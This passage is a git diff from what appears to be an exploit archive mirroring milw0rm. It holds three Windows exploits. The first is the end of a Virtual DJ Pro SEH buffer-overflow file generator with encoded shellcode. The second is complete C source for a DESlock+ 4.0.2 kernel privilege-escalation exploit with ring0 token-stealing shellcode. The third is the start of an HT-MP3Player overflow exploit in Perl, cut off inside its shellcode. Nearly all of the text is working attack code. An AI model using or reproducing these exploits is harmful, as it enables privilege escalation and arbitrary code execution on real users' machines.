+    0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 
+    0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 
+    0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 
+    0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 
+    0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 
+    0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0xF0, 
+    0x69, 0x83, 0x7C, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 
+    0x90, 0x90, 0xEB, 0x03, 0x59, 0xEB, 0x05, 0xE8, 0xF8, 0xFF, 0xFF, 0xFF, 0x49, 0x49, 0x49, 0x49, 
+    0x49, 0x49, 0x49, 0x49, 0x49, 0x49, 0x49, 0x49, 0x49, 0x49, 0x49, 0x49, 0x49, 0x51, 0x5A, 0x37, 
+    0x6A, 0x63, 0x58, 0x30, 0x42, 0x30, 0x50, 0x42, 0x6B, 0x42, 0x41, 0x73, 0x41, 0x42, 0x32, 0x42, 
+    0x41, 0x32, 0x41, 0x41, 0x30, 0x41, 0x41, 0x58, 0x38, 0x42, 0x42, 0x50, 0x75, 0x38, 0x69, 0x69, 
+    0x6C, 0x38, 0x68, 0x41, 0x54, 0x77, 0x70, 0x57, 0x70, 0x75, 0x50, 0x6E, 0x6B, 0x41, 0x55, 0x55, 
+    0x6C, 0x6E, 0x6B, 0x43, 0x4C, 0x66, 0x65, 0x41, 0x68, 0x45, 0x51, 0x58, 0x6F, 0x4C, 0x4B, 0x50, 
+    0x4F, 0x62, 0x38, 0x6E, 0x6B, 0x41, 0x4F, 0x31, 0x30, 0x36, 0x61, 0x4A, 0x4B, 0x41, 0x59, 0x6C, 
+    0x4B, 0x74, 0x74, 0x6E, 0x6B, 0x44, 0x41, 0x4A, 0x4E, 0x47, 0x41, 0x4B, 0x70, 0x6F, 0x69, 0x6C, 
+    0x6C, 0x4C, 0x44, 0x4B, 0x70, 0x43, 0x44, 0x76, 0x67, 0x4B, 0x71, 0x4A, 0x6A, 0x66, 0x6D, 0x66, 
+    0x61, 0x39, 0x52, 0x5A, 0x4B, 0x4A, 0x54, 0x75, 0x6B, 0x62, 0x74, 0x56, 0x44, 0x73, 0x34, 0x41, 
+    0x65, 0x4B, 0x55, 0x4E, 0x6B, 0x73, 0x6F, 0x54, 0x64, 0x53, 0x31, 0x6A, 0x4B, 0x35, 0x36, 0x6C, 
+    0x4B, 0x64, 0x4C, 0x30, 0x4B, 0x6C, 0x4B, 0x73, 0x6F, 0x57, 0x6C, 0x75, 0x51, 0x6A, 0x4B, 0x6C, 
+    0x4B, 0x37, 0x6C, 0x6C, 0x4B, 0x77, 0x71, 0x68, 0x6B, 0x4C, 0x49, 0x71, 0x4C, 0x51, 0x34, 0x43, 
+    0x34, 0x6B, 0x73, 0x46, 0x51, 0x79, 0x50, 0x71, 0x74, 0x4C, 0x4B, 0x67, 0x30, 0x36, 0x50, 0x4C, 
+    0x45, 0x4B, 0x70, 0x62, 0x58, 0x74, 0x4C, 0x6C, 0x4B, 0x53, 0x70, 0x56, 0x6C, 0x4E, 0x6B, 0x34, 
+    0x30, 0x47, 0x6C, 0x4E, 0x4D, 0x6C, 0x4B, 0x70, 0x68, 0x37, 0x78, 0x58, 0x6B, 0x53, 0x39, 0x6C, 
+    0x4B, 0x4F, 0x70, 0x6C, 0x70, 0x53, 0x30, 0x43, 0x30, 0x73, 0x30, 0x6C, 0x4B, 0x42, 0x48, 0x77, 
+    0x4C, 0x61, 0x4F, 0x44, 0x71, 0x6B, 0x46, 0x73, 0x50, 0x72, 0x76, 0x6B, 0x39, 0x5A, 0x58, 0x6F, 
+    0x73, 0x4F, 0x30, 0x73, 0x4B, 0x56, 0x30, 0x31, 0x78, 0x61, 0x6E, 0x6A, 0x78, 0x4B, 0x52, 0x74, 
+    0x33, 0x55, 0x38, 0x4A, 0x38, 0x69, 0x6E, 0x6C, 0x4A, 0x54, 0x4E, 0x52, 0x77, 0x79, 0x6F, 0x79, 
+    0x77, 0x42, 0x43, 0x50, 0x61, 0x70, 0x6C, 0x41, 0x73, 0x64, 0x6E, 0x51, 0x75, 0x52, 0x58, 0x31, 
+    0x75, 0x57, 0x70, 0x63, 0x72, 0x20, 0x4F, 0x66, 0x20, 0x54, 0x68, 0x65, 0x20, 0x44, 0x6F, 0x67, 
+    0x20, 0x41, 0x67, 0x61, 0x69, 0x6E, 0x20, 0x28, 0x32, 0x30, 0x30, 0x36, 0x29, 0x5B, 0x54, 0x2D, 
+    0x42, 0x6F, 0x79, 0x7A, 0x5D, 0x5C, 0x31, 0x33, 0x2E, 0x20, 0x44, 0x4D, 0x58, 0x20, 0x2D, 0x20, 
+    0x4C, 0x69, 0x66, 0x65, 0x20, 0x62, 0x65, 0x20, 0x6D, 0x79, 0x20, 0x53, 0x6F, 0x6E, 0x67, 0x2E, 
+    0x6D, 0x70, 0x33, 0x0D, 0x0A, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 
+    0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 
+    0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 
+} ;
+
+ int main ( int argc, char *argv[] )
+{ if ( argc < 2) 
+       fprintf ( stdout, "Usage is %s file.m3u\n", argv [0] );
+       fprintf ( stdout ,"\tAtomix.Virtual.DJ.Pro.v6.0 STACK BUFFER OVERFLOW ( SEH OVERWRITE )\n");
+       fprintf ( stdout , "\tCREDITS: fl0 fl0w\n");
+
+       FILE *f; f = fopen ( argv[1] , "wb" );  assert ( f != NULL ); fprintf ( f, rawData ); return 0; }
+
+// milw0rm.com [2009-06-03]
diff --git a/platforms/windows/local/8983.c b/platforms/windows/local/8983.c
index 157811cd3..08eb76c16 100755
--- a/platforms/windows/local/8983.c
+++ b/platforms/windows/local/8983.c
@@ -1,310 +1,310 @@
-/* deslock-dlpcrypt.c
- *
- * Copyright (c) 2009 by 
- *
- * DESlock+ 4.0.2 local kernel SYSTEM exploit
- * by mu-b - Thu 18 Jun 2009
- *
- * - Tested on: dlpcrypt.sys 0.1.1.27
- *
- * .text:0001BB2E: 'what do ya want for nothing?'
- *  - hmmm, something that doesn't pass kernel mode pointers
- *    between kernel and userland?
- *
- * Compile: MinGW + -lntdll
- *
- *    - Private Source Code -DO NOT DISTRIBUTE -
- * http://www.digit-labs.org/ -- Digit-Labs 2009!@$!
- */
-
-#include 
-#include 
-
-#include 
-
-#define DLPCRYPT_IOCTL_ENABLED  0x8001200C
-#define DLPCRYPT_IOCTL_ADD      0x80012004
-#define DLPCRYPT_IOCTL_PROCESS  0x80012010
-
-#define DLPCRYPT_FLAG1          0x13B45FA8
-#define DLPCRYPT_FLAG2          0xBFD294C9
-
-static unsigned char win32_fixup[] =
-  "\x56";
-
-/* Win2k3 SP1/2 - kernel EPROCESS token switcher
- * by mu-b 
- */
-static unsigned char win2k3_ring0_shell[] =
-  /* _ring0 */
-  "\xb8\x24\xf1\xdf\xff"
-  "\x8b\x00"
-  "\x8b\xb0\x18\x02\x00\x00"
-  "\x89\xf0"
-  /* _sys_eprocess_loop   */
-  "\x8b\x98\x94\x00\x00\x00"
-  "\x81\xfb\x04\x00\x00\x00"
-  "\x74\x11"
-  "\x8b\x80\x9c\x00\x00\x00"
-  "\x2d\x98\x00\x00\x00"
-  "\x39\xf0"
-  "\x75\xe3"
-  "\xeb\x21"
-  /* _sys_eprocess_found  */
-  "\x89\xc1"
-  "\x89\xf0"
-
-  /* _cmd_eprocess_loop   */
-  "\x8b\x98\x94\x00\x00\x00"
-  "\x81\xfb\x00\x00\x00\x00"
-  "\x74\x10"
-  "\x8b\x80\x9c\x00\x00\x00"
-  "\x2d\x98\x00\x00\x00"
-  "\x39\xf0"
-  "\x75\xe3"
-  /* _not_found           */
-  "\xcc"
-  /* _cmd_eprocess_found
-   * _ring0_end           */
-
-  /* copy tokens!$%!      */
-  "\x8b\x89\xd8\x00\x00\x00"
-  "\x89\x88\xd8\x00\x00\x00"
-  "\x90";
-
-static unsigned char winxp_ring0_shell[] =
-  /* _ring0 */
-  "\xb8\x24\xf1\xdf\xff"
-  "\x8b\x00"
-  "\x8b\x70\x44"
-  "\x89\xf0"
-  /* _sys_eprocess_loop   */
-  "\x8b\x98\x84\x00\x00\x00"
-  "\x81\xfb\x04\x00\x00\x00"
-  "\x74\x11"
-  "\x8b\x80\x8c\x00\x00\x00"
-  "\x2d\x88\x00\x00\x00"
-  "\x39\xf0"
-  "\x75\xe3"
-  "\xeb\x21"
-  /* _sys_eprocess_found  */
-  "\x89\xc1"
-  "\x89\xf0"
-
-  /* _cmd_eprocess_loop   */
-  "\x8b\x98\x84\x00\x00\x00"
-  "\x81\xfb\x00\x00\x00\x00"
-  "\x74\x10"
-  "\x8b\x80\x8c\x00\x00\x00"
-  "\x2d\x88\x00\x00\x00"
-  "\x39\xf0"
-  "\x75\xe3"
-  /* _not_found           */
-  "\xcc"
-  /* _cmd_eprocess_found
-   * _ring0_end           */
-
-  /* copy tokens!$%!      */
-  "\x8b\x89\xc8\x00\x00\x00"
-  "\x89\x88\xc8\x00\x00\x00"
-  "\x90";
-
-static unsigned char win32_ret[] =
-  "\x5e"
-  "\x58"
-  "\x58"
-  "\x33\xc0"
-  "\x5e"
-  "\x5d"
-  "\xc2\x0c\x00";
-
-struct ioctl_req_enable {
-  int flag[2];
-  int len;
-  int result;
-  int enabled;
-  char pad[0x38 - 0x14];
-};
-
-struct ioctl_req {
-  int flag[2];
-  int len;
-  int result;
-  int action;
-  struct ioctl_ptr *ptr;
-  char pad[0x38 - 0x18];
-};
-
-struct ioctl_ptr {
-  char pad[0x8];
-  struct ioctl_pid *ppid;
-  int action;
-  char _pad[0x4];
-  struct ioctl_func *func;
-};
-
-struct ioctl_pid {
-  char pad[0x14];
-  DWORD pid;
-};
-
-struct ioctl_func {
-  void *func_ptr;
-};
-
-static PCHAR
-fixup_ring0_shell (DWORD ppid, DWORD *zlen)
-{
-  DWORD dwVersion, dwMajorVersion, dwMinorVersion;
-
-  dwVersion = GetVersion ();
-  dwMajorVersion = (DWORD) (LOBYTE(LOWORD(dwVersion)));
-  dwMinorVersion = (DWORD) (HIBYTE(LOWORD(dwVersion)));
-
-  if (dwMajorVersion != 5)
-    {
-      fprintf (stderr, "* GetVersion, unsupported version\n");
-      exit (EXIT_FAILURE);
-    }
-
-  switch (dwMinorVersion)
-    {
-      case 1:
-        *zlen = sizeof winxp_ring0_shell - 1;
-        *(PDWORD) &winxp_ring0_shell[55] = ppid;
-        return (winxp_ring0_shell);
-
-      case 2:
-        *zlen = sizeof win2k3_ring0_shell - 1;
-        *(PDWORD) &win2k3_ring0_shell[58] = ppid;
-        return (win2k3_ring0_shell);
-
-      default:
-        fprintf (stderr, "* GetVersion, unsupported version\n");
-        exit (EXIT_FAILURE);
-    }
-
-  return (NULL);
-}
-
-int
-main (int argc, char **argv)
-{
-  struct ioctl_req_enable req_enable;
-  struct ioctl_req req;
-  struct ioctl_ptr ptr;
-  struct ioctl_pid pid;
-  struct ioctl_func func;
-  LPVOID c_addr, zpage, zbuf;
-  DWORD rlen, zlen, ppid;
-  HANDLE hFile;
-  BOOL bResult;
-
-  printf ("DESlock+ 4.0.2 local kernel SYSTEM exploit\n"
-          "by: \n"
-          "http://www.digit-labs.org/ -- Digit-Labs 2009!@$!\n\n");
-
-  if (argc <= 1)
-    {
-      fprintf (stderr, "Usage: %s \n", argv[0]);
-      exit (EXIT_SUCCESS);
-    }
-
-  ppid = atoi (argv[1]);
-
-  hFile = CreateFileA ("\\\\.\\DLPCryptCore", FILE_EXECUTE,
-                       FILE_SHARE_READ|FILE_SHARE_WRITE, NULL,
-                       OPEN_EXISTING, 0, NULL);
-  if (hFile == INVALID_HANDLE_VALUE)
-    {
-      fprintf (stderr, "* CreateFileA failed, %d\n", hFile);
-      exit (EXIT_FAILURE);
-    }
-
-  zpage = VirtualAlloc (NULL, 0x10000, MEM_RESERVE|MEM_COMMIT, PAGE_EXECUTE_READWRITE);
-  if (zpage == NULL)
-    {
-      fprintf (stderr, "* VirtualAlloc failed\n");
-      exit (EXIT_FAILURE);
-    }
-  printf ("* allocated page: 0x%08X [%d-bytes]\n",
-          zpage, 0x10000);
-
-  memset (zpage, 0xCC, 0x10000);
-  zbuf = fixup_ring0_shell (ppid, &zlen);
-  memcpy (zpage, win32_fixup, sizeof (win32_fixup) - 1);
-  memcpy (zpage + sizeof (win32_fixup) - 1, zbuf, zlen);
-  memcpy (zpage + sizeof (win32_fixup) + zlen - 1,
-          win32_ret, sizeof (win32_ret) - 1);
-
-  memset (&req_enable, 0, sizeof req_enable);
-  req_enable.flag[0] = DLPCRYPT_FLAG1;
-  req_enable.flag[1] = DLPCRYPT_FLAG2;
-  req_enable.len = sizeof req_enable;
-
-  printf ("* verifying context... ");
-  bResult = DeviceIoControl (hFile, DLPCRYPT_IOCTL_ENABLED,
-                             &req_enable, sizeof req_enable,
-                             &req_enable, sizeof req_enable, &rlen, 0);
-  if (!bResult)
-    {
-      fprintf (stderr, "* DeviceIoControl failed\n");
-      exit (EXIT_FAILURE);
-    }
-  printf ("result: %d, enabled: %d\n", req_enable.result, req_enable.enabled);
-
-  printf ("* adding pid [%d]... ", GetCurrentProcessId ());
-  bResult = DeviceIoControl (hFile, DLPCRYPT_IOCTL_ADD,
-                             &req_enable, sizeof req_enable,
-                             &req_enable, sizeof req_enable, &rlen, 0);
-  if (!bResult)
-    {
-      fprintf (stderr, "* DeviceIoControl failed\n");
-      exit (EXIT_FAILURE);
-    }
-  printf ("done\n");
-
-  memset (&req, 0, sizeof req);
-  req.flag[0] = DLPCRYPT_FLAG1;
-  req.flag[1] = DLPCRYPT_FLAG2;
-  req.len = sizeof req;
-  req.action = 2;
-  req.ptr = &ptr;
-
-  memset (&ptr, 0, sizeof ptr);
-  ptr.ppid = &pid;
-  ptr.action = 2;
-  ptr.func = &func;
-
-  memset (&pid, 0, sizeof pid);
-  pid.pid = GetCurrentProcessId ();
-
-  memset (&func, 0, sizeof func);
-  func.func_ptr = &c_addr;
-
-  c_addr = (LPVOID) zpage;
-
-  printf ("* req.ptr: 0x%08X\n", &ptr);
-  printf ("* @0x%08X: ppid_ptr: 0x%08X, func_ptr:  0x%08X\n",
-          &ptr, ptr.ppid, ptr.func);
-  printf ("* @0x%08X: func_ptr: 0x%08X\n", ptr.func, func.func_ptr);
-  printf ("* @0x%08X: func_ptr: 0x%08X\n", &c_addr, c_addr);
-
-  /* jump to our address :) */
-  printf ("* jumping.. ");
-  bResult = DeviceIoControl (hFile, DLPCRYPT_IOCTL_PROCESS,
-                             &req, sizeof req, &req, sizeof req, &rlen, 0);
-  if (!bResult)
-    {
-      fprintf (stderr, "* DeviceIoControl failed\n");
-      exit (EXIT_FAILURE);
-    }
-  printf ("done\n\n"
-          "* hmmm, you didn't STOP the box?!?!\n");
-
-  CloseHandle (hFile);
-
-  return (EXIT_SUCCESS);
-}
-
-// milw0rm.com [2009-06-18]
+/* deslock-dlpcrypt.c
+ *
+ * Copyright (c) 2009 by 
+ *
+ * DESlock+ 4.0.2 local kernel SYSTEM exploit
+ * by mu-b - Thu 18 Jun 2009
+ *
+ * - Tested on: dlpcrypt.sys 0.1.1.27
+ *
+ * .text:0001BB2E: 'what do ya want for nothing?'
+ *  - hmmm, something that doesn't pass kernel mode pointers
+ *    between kernel and userland?
+ *
+ * Compile: MinGW + -lntdll
+ *
+ *    - Private Source Code -DO NOT DISTRIBUTE -
+ * http://www.digit-labs.org/ -- Digit-Labs 2009!@$!
+ */
+
+#include 
+#include 
+
+#include 
+
+#define DLPCRYPT_IOCTL_ENABLED  0x8001200C
+#define DLPCRYPT_IOCTL_ADD      0x80012004
+#define DLPCRYPT_IOCTL_PROCESS  0x80012010
+
+#define DLPCRYPT_FLAG1          0x13B45FA8
+#define DLPCRYPT_FLAG2          0xBFD294C9
+
+static unsigned char win32_fixup[] =
+  "\x56";
+
+/* Win2k3 SP1/2 - kernel EPROCESS token switcher
+ * by mu-b 
+ */
+static unsigned char win2k3_ring0_shell[] =
+  /* _ring0 */
+  "\xb8\x24\xf1\xdf\xff"
+  "\x8b\x00"
+  "\x8b\xb0\x18\x02\x00\x00"
+  "\x89\xf0"
+  /* _sys_eprocess_loop   */
+  "\x8b\x98\x94\x00\x00\x00"
+  "\x81\xfb\x04\x00\x00\x00"
+  "\x74\x11"
+  "\x8b\x80\x9c\x00\x00\x00"
+  "\x2d\x98\x00\x00\x00"
+  "\x39\xf0"
+  "\x75\xe3"
+  "\xeb\x21"
+  /* _sys_eprocess_found  */
+  "\x89\xc1"
+  "\x89\xf0"
+
+  /* _cmd_eprocess_loop   */
+  "\x8b\x98\x94\x00\x00\x00"
+  "\x81\xfb\x00\x00\x00\x00"
+  "\x74\x10"
+  "\x8b\x80\x9c\x00\x00\x00"
+  "\x2d\x98\x00\x00\x00"
+  "\x39\xf0"
+  "\x75\xe3"
+  /* _not_found           */
+  "\xcc"
+  /* _cmd_eprocess_found
+   * _ring0_end           */
+
+  /* copy tokens!$%!      */
+  "\x8b\x89\xd8\x00\x00\x00"
+  "\x89\x88\xd8\x00\x00\x00"
+  "\x90";
+
+static unsigned char winxp_ring0_shell[] =
+  /* _ring0 */
+  "\xb8\x24\xf1\xdf\xff"
+  "\x8b\x00"
+  "\x8b\x70\x44"
+  "\x89\xf0"
+  /* _sys_eprocess_loop   */
+  "\x8b\x98\x84\x00\x00\x00"
+  "\x81\xfb\x04\x00\x00\x00"
+  "\x74\x11"
+  "\x8b\x80\x8c\x00\x00\x00"
+  "\x2d\x88\x00\x00\x00"
+  "\x39\xf0"
+  "\x75\xe3"
+  "\xeb\x21"
+  /* _sys_eprocess_found  */
+  "\x89\xc1"
+  "\x89\xf0"
+
+  /* _cmd_eprocess_loop   */
+  "\x8b\x98\x84\x00\x00\x00"
+  "\x81\xfb\x00\x00\x00\x00"
+  "\x74\x10"
+  "\x8b\x80\x8c\x00\x00\x00"
+  "\x2d\x88\x00\x00\x00"
+  "\x39\xf0"
+  "\x75\xe3"
+  /* _not_found           */
+  "\xcc"
+  /* _cmd_eprocess_found
+   * _ring0_end           */
+
+  /* copy tokens!$%!      */
+  "\x8b\x89\xc8\x00\x00\x00"
+  "\x89\x88\xc8\x00\x00\x00"
+  "\x90";
+
+static unsigned char win32_ret[] =
+  "\x5e"
+  "\x58"
+  "\x58"
+  "\x33\xc0"
+  "\x5e"
+  "\x5d"
+  "\xc2\x0c\x00";
+
+struct ioctl_req_enable {
+  int flag[2];
+  int len;
+  int result;
+  int enabled;
+  char pad[0x38 - 0x14];
+};
+
+struct ioctl_req {
+  int flag[2];
+  int len;
+  int result;
+  int action;
+  struct ioctl_ptr *ptr;
+  char pad[0x38 - 0x18];
+};
+
+struct ioctl_ptr {
+  char pad[0x8];
+  struct ioctl_pid *ppid;
+  int action;
+  char _pad[0x4];
+  struct ioctl_func *func;
+};
+
+struct ioctl_pid {
+  char pad[0x14];
+  DWORD pid;
+};
+
+struct ioctl_func {
+  void *func_ptr;
+};
+
+static PCHAR
+fixup_ring0_shell (DWORD ppid, DWORD *zlen)
+{
+  DWORD dwVersion, dwMajorVersion, dwMinorVersion;
+
+  dwVersion = GetVersion ();
+  dwMajorVersion = (DWORD) (LOBYTE(LOWORD(dwVersion)));
+  dwMinorVersion = (DWORD) (HIBYTE(LOWORD(dwVersion)));
+
+  if (dwMajorVersion != 5)
+    {
+      fprintf (stderr, "* GetVersion, unsupported version\n");
+      exit (EXIT_FAILURE);
+    }
+
+  switch (dwMinorVersion)
+    {
+      case 1:
+        *zlen = sizeof winxp_ring0_shell - 1;
+        *(PDWORD) &winxp_ring0_shell[55] = ppid;
+        return (winxp_ring0_shell);
+
+      case 2:
+        *zlen = sizeof win2k3_ring0_shell - 1;
+        *(PDWORD) &win2k3_ring0_shell[58] = ppid;
+        return (win2k3_ring0_shell);
+
+      default:
+        fprintf (stderr, "* GetVersion, unsupported version\n");
+        exit (EXIT_FAILURE);
+    }
+
+  return (NULL);
+}
+
+int
+main (int argc, char **argv)
+{
+  struct ioctl_req_enable req_enable;
+  struct ioctl_req req;
+  struct ioctl_ptr ptr;
+  struct ioctl_pid pid;
+  struct ioctl_func func;
+  LPVOID c_addr, zpage, zbuf;
+  DWORD rlen, zlen, ppid;
+  HANDLE hFile;
+  BOOL bResult;
+
+  printf ("DESlock+ 4.0.2 local kernel SYSTEM exploit\n"
+          "by: \n"
+          "http://www.digit-labs.org/ -- Digit-Labs 2009!@$!\n\n");
+
+  if (argc <= 1)
+    {
+      fprintf (stderr, "Usage: %s \n", argv[0]);
+      exit (EXIT_SUCCESS);
+    }
+
+  ppid = atoi (argv[1]);
+
+  hFile = CreateFileA ("\\\\.\\DLPCryptCore", FILE_EXECUTE,
+                       FILE_SHARE_READ|FILE_SHARE_WRITE, NULL,
+                       OPEN_EXISTING, 0, NULL);
+  if (hFile == INVALID_HANDLE_VALUE)
+    {
+      fprintf (stderr, "* CreateFileA failed, %d\n", hFile);
+      exit (EXIT_FAILURE);
+    }
+
+  zpage = VirtualAlloc (NULL, 0x10000, MEM_RESERVE|MEM_COMMIT, PAGE_EXECUTE_READWRITE);
+  if (zpage == NULL)
+    {
+      fprintf (stderr, "* VirtualAlloc failed\n");
+      exit (EXIT_FAILURE);
+    }
+  printf ("* allocated page: 0x%08X [%d-bytes]\n",
+          zpage, 0x10000);
+
+  memset (zpage, 0xCC, 0x10000);
+  zbuf = fixup_ring0_shell (ppid, &zlen);
+  memcpy (zpage, win32_fixup, sizeof (win32_fixup) - 1);
+  memcpy (zpage + sizeof (win32_fixup) - 1, zbuf, zlen);
+  memcpy (zpage + sizeof (win32_fixup) + zlen - 1,
+          win32_ret, sizeof (win32_ret) - 1);
+
+  memset (&req_enable, 0, sizeof req_enable);
+  req_enable.flag[0] = DLPCRYPT_FLAG1;
+  req_enable.flag[1] = DLPCRYPT_FLAG2;
+  req_enable.len = sizeof req_enable;
+
+  printf ("* verifying context... ");
+  bResult = DeviceIoControl (hFile, DLPCRYPT_IOCTL_ENABLED,
+                             &req_enable, sizeof req_enable,
+                             &req_enable, sizeof req_enable, &rlen, 0);
+  if (!bResult)
+    {
+      fprintf (stderr, "* DeviceIoControl failed\n");
+      exit (EXIT_FAILURE);
+    }
+  printf ("result: %d, enabled: %d\n", req_enable.result, req_enable.enabled);
+
+  printf ("* adding pid [%d]... ", GetCurrentProcessId ());
+  bResult = DeviceIoControl (hFile, DLPCRYPT_IOCTL_ADD,
+                             &req_enable, sizeof req_enable,
+                             &req_enable, sizeof req_enable, &rlen, 0);
+  if (!bResult)
+    {
+      fprintf (stderr, "* DeviceIoControl failed\n");
+      exit (EXIT_FAILURE);
+    }
+  printf ("done\n");
+
+  memset (&req, 0, sizeof req);
+  req.flag[0] = DLPCRYPT_FLAG1;
+  req.flag[1] = DLPCRYPT_FLAG2;
+  req.len = sizeof req;
+  req.action = 2;
+  req.ptr = &ptr;
+
+  memset (&ptr, 0, sizeof ptr);
+  ptr.ppid = &pid;
+  ptr.action = 2;
+  ptr.func = &func;
+
+  memset (&pid, 0, sizeof pid);
+  pid.pid = GetCurrentProcessId ();
+
+  memset (&func, 0, sizeof func);
+  func.func_ptr = &c_addr;
+
+  c_addr = (LPVOID) zpage;
+
+  printf ("* req.ptr: 0x%08X\n", &ptr);
+  printf ("* @0x%08X: ppid_ptr: 0x%08X, func_ptr:  0x%08X\n",
+          &ptr, ptr.ppid, ptr.func);
+  printf ("* @0x%08X: func_ptr: 0x%08X\n", ptr.func, func.func_ptr);
+  printf ("* @0x%08X: func_ptr: 0x%08X\n", &c_addr, c_addr);
+
+  /* jump to our address :) */
+  printf ("* jumping.. ");
+  bResult = DeviceIoControl (hFile, DLPCRYPT_IOCTL_PROCESS,
+                             &req, sizeof req, &req, sizeof req, &rlen, 0);
+  if (!bResult)
+    {
+      fprintf (stderr, "* DeviceIoControl failed\n");
+      exit (EXIT_FAILURE);
+    }
+  printf ("done\n\n"
+          "* hmmm, you didn't STOP the box?!?!\n");
+
+  CloseHandle (hFile);
+
+  return (EXIT_SUCCESS);
+}
+
+// milw0rm.com [2009-06-18]
diff --git a/platforms/windows/local/9034.pl b/platforms/windows/local/9034.pl
index 4abb9ea21..b44e647b7 100755
--- a/platforms/windows/local/9034.pl
+++ b/platforms/windows/local/9034.pl
@@ -1,42 +1,42 @@
-#!/usr/bin/perl
-# by hack4love
-# hack4love@hotmail.com
-# HT-MP3Player 1.0 (.ht3 File) Local buffer Overflow (seh)
-# # Greetz to all my friends
-# form egypt
-## easy :d
-## Tested on: Windows XP Pro SP2 (EN)
-##########################################################
-my $bof="\x41" x 4108;
-my $nsh="\xEB\x06\x90\x90";
-my $seh="\xbe\x2e\xd1\x72";
-my $nop="\x90" x 20;
-my $sec=
-"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
-"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
-"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
-"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
-"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34".
-"\x42\x50\x42\x50\x42\x30\x4b\x38\x45\x34\x4e\x43\x4b\x48\x4e\x47".
-"\x45\x30\x4a\x47\x41\x50\x4f\x4e\x4b\x48\x4f\x44\x4a\x41\x4b\x48".
-"\x4f\x55\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x58\x46\x43\x4b\x38".
-"\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c".
-"\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e".
-"\x46\x4f\x4b\x43\x46\x55\x46\x32\x46\x30\x45\x47\x45\x4e\x4b\x48".
-"\x4f\x35\x46\x32\x41\x30\x4b\x4e\x48\x56\x4b\x58\x4e\x30\x4b\x44".
-"\x4b\x58\x4f\x55\x4e\x31\x41\x50\x4b\x4e\x4b\x58\x4e\x51\x4b\x48".
-"\x41\x50\x4b\x4e\x49\x58\x4e\x55\x46\x42\x46\x30\x43\x4c\x41\x33".
-"\x42\x4c\x46\x36\x4b\x38\x42\x44\x42\x53\x45\x48\x42\x4c\x4a\x37".
-"\x4e\x30\x4b\x48\x42\x54\x4e\x30\x4b\x58\x42\x57\x4e\x51\x4d\x4a".
-"\x4b\x38\x4a\x36\x4a\x50\x4b\x4e\x49\x30\x4b\x48\x42\x48\x42\x4b".
-"\x42\x50\x42\x50\x42\x50\x4b\x48\x4a\x56\x4e\x33\x4f\x35\x41\x53".
-"\x48\x4f\x42\x56\x48\x45\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x57".
-"\x42\x35\x4a\x46\x42\x4f\x4c\x58\x46\x50\x4f\x55\x4a\x36\x4a\x59".
-"\x50\x4f\x4c\x38\x50\x50\x47\x35\x4f\x4f\x47\x4e\x43\x36\x41\x56".
-"\x4e\x56\x43\x46\x42\x30\x5a";
-############################################################
-open(myfile,'>>hack4love.ht3');
-print myfile $bof.$nsh.$seh.$nop.$sec;
-############################################################
-
-# milw0rm.com [2009-06-29]
+#!/usr/bin/perl
+# by hack4love
+# hack4love@hotmail.com
+# HT-MP3Player 1.0 (.ht3 File) Local buffer Overflow (seh)
+# # Greetz to all my friends
+# form egypt
+## easy :d
+## Tested on: Windows XP Pro SP2 (EN)
+##########################################################
+my $bof="\x41" x 4108;
+my $nsh="\xEB\x06\x90\x90";
+my $seh="\xbe\x2e\xd1\x72";
+my $nop="\x90" x 20;
+my $sec=
+"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
+"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
+"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
+"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
+"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34".
+"\x42\x50\x42\x50\x42\x30\x4b\x38\x45\x34\x4e\x43\x4b\x48\x4e\x47".
+"\x45\x30\x4a\x47\x41\x50\x4f\x4e\x4b\x48\x4f\x44\x4a\x41\x4b\x48".
+"\x4f\x55\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x58\x46\x43\x4b\x38".
+"\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c".
